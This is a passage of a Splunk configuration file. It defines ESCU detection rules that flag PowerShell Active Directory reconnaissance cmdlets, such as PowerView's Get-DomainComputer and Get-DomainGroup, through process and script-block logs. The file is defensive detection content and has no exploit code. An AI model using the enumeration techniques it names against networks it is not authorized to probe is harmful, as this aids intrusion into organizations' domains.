action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetDomainComputer with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetDomainComputer with PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-DomainComputer*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getdomaincomputer_with_powershell_filter`

[ESCU - GetDomainComputer with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainComputer` commandlet. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainComputer` commandlet. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting.
action.escu.creation_date = 2022-05-02
action.escu.modification_date = 2022-05-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetDomainComputer with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Remote system discovery with PowerView on $Computer$ by $user$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 24}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetDomainComputer with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainComputer` commandlet. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetDomainComputer with PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-DomainComputer*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getdomaincomputer_with_powershell_script_block_filter`

[ESCU - GetDomainController with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting.
action.escu.creation_date = 2021-09-07
action.escu.modification_date = 2021-09-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetDomainController with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetDomainController with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-DomainController*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getdomaincontroller_with_powershell_filter`

[ESCU - GetDomainController with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainController` commandlet. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainController` commandlet. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-05-02
action.escu.modification_date = 2022-05-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetDomainController with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Remote system discovery with PowerView on $Computer$ by $UserID$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 24}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetDomainController with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainController` commandlet. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetDomainController with PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-DomainController*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getdomaincontroller_with_powershell_script_block_filter`

[ESCU - GetDomainGroup with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-25
action.escu.modification_date = 2021-08-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetDomainGroup with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Domain group discovery with PowerView on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetDomainGroup with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetDomainGroup with PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-DomainGroup*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getdomaingroup_with_powershell_filter`

[ESCU - GetDomainGroup with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroup` commandlet. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroup` is used to query domain groups. Red Teams and adversaries may leverage this function to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroup` commandlet. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroup` is used to query domain groups. Red Teams and adversaries may leverage this function to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use these PowerView functions for troubleshooting.
action.escu.creation_date = 2022-05-02
action.escu.modification_date = 2022-05-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetDomainGroup with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Domain group discovery enumeration using PowerView on $Computer$ by $UserID$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetDomainGroup with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroup` commandlet. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroup` is used to query domain groups. Red Teams and adversaries may leverage this function to enumerate domain groups for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetDomainGroup with PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-DomainGroup*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getdomaingroup_with_powershell_script_block_filter`

[ESCU - GetLocalUser with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for local users. The `Get-LocalUser` commandlet is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for local users. The `Get-LocalUser` commandlet is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2021-08-23
action.escu.modification_date = 2021-08-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetLocalUser with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetLocalUser with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-LocalUser*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getlocaluser_with_powershell_filter`

[ESCU - GetLocalUser with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-LocalUser` commandlet. The `Get-LocalUser` commandlet is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1087", "T1087.001", "T1059.001"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-LocalUser` commandlet. The `Get-LocalUser` commandlet is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-03-22
action.escu.modification_date = 2022-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetLocalUser with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery", "Malicious PowerShell"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetLocalUser with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1087", "T1087.001", "T1059.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-LocalUser*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getlocaluser_with_powershell_script_block_filter`

[ESCU - GetNetTcpconnection with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line utilized to get a listing of network connections on a compromised system. The `Get-NetTcpConnection` commandlet lists the current TCP connections. Red Teams and adversaries alike may use this commandlet for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line utilized to get a listing of network connections on a compromised system. The `Get-NetTcpConnection` commandlet lists the current TCP connections. Red Teams and adversaries alike may use this commandlet for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-25
action.escu.modification_date = 2021-08-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetNetTcpconnection with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetNetTcpconnection with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-NetTcpConnection*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getnettcpconnection_with_powershell_filter`

[ESCU - GetNetTcpconnection with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-NetTcpconnection` commandlet. This commandlet is used to return a listing of network connections on a compromised system. Red Teams and adversaries alike may use this commandlet for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-NetTcpconnection` commandlet. This commandlet is used to return a listing of network connections on a compromised system. Red Teams and adversaries alike may use this commandlet for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-04-02
action.escu.modification_date = 2022-04-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetNetTcpconnection with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetNetTcpconnection with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-NetTcpconnection*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getnettcpconnection_with_powershell_script_block_filter`

[ESCU - GetWmiObject Ds Computer with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-WmiObject` commandlet combined with the `DS_Computer` parameter can be used to return a list of all domain computers. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-WmiObject` commandlet combined with the `DS_Computer` parameter can be used to return a list of all domain computers. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-09-07
action.escu.modification_date = 2021-09-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetWmiObject Ds Computer with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Remote system discovery enumeration using WMI on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 21}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetWmiObject Ds Computer with PowerShell - Rule
